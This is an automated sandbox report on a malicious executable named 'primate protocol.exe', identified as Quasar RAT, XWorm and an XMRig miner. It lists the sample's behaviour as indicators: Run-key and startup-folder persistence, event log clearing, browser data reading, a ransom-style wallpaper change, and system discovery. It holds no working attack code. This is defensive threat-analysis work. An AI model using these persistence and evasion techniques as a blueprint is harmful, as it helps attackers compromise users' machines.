Malware Analysis Report

2025-08-05 15:10

Sample ID 250503-tqq3hswsgw
Target primate protocol.exe
SHA256 fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
Tags
quasar xmrig xworm client defense_evasion discovery execution miner persistence privilege_escalation ransomware rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75

Threat Level: Known bad

The file primate protocol.exe was found to be: Known bad.

Malicious Activity Summary

quasar xmrig xworm client defense_evasion discovery execution miner persistence privilege_escalation ransomware rat spyware stealer trojan upx

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm

Xworm family

Xmrig family

Quasar payload

Detect Xworm Payload

Quasar RAT

Quasar family

XMRig Miner payload

Creates new service(s)

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Indicator Removal: Clear Windows Event Logs

Drops startup file

Checks computer location settings

Reads user/profile data of web browsers

Checks BIOS information in registry

Obfuscated Files or Information: Command Obfuscation

Adds Run key to start application

Suspicious use of SetThreadContext

Sets desktop wallpaper using registry

Drops file in System32 directory

UPX packed file

Drops file in Windows directory

Launches sc.exe

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

Checks SCSI registry key(s)

Suspicious use of UnmapMainImage

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Checks processor information in registry

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-05-03 16:16

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-05-03 16:15

Reported

2025-05-03 16:18

Platform

win10v2004-20250502-en

Max time kernel

133s

Max time network

149s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 4480 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe
PID 5052 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Creates new service(s)

persistence execution

Stops running service(s)

defense_evasion execution

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\CompPkg.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\systemprocess.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A

Indicator Removal: Clear Windows Event Logs

defense_evasion
Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | C:\Windows\System32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | C:\Windows\System32\svchost.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" | C:\Windows\CompPkg.exe | N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A

Sets desktop wallpaper using registry

ransomware
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img" | C:\Windows\CompPkg.exe | N/A

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\systemprocess.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A
File created | C:\Windows\host.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A
File created | C:\Windows\CompPkg.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Delays execution with timeout.exe

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133907626609832177" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1746289067" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

Modifies registry class

Description | Indicator | Process | Target
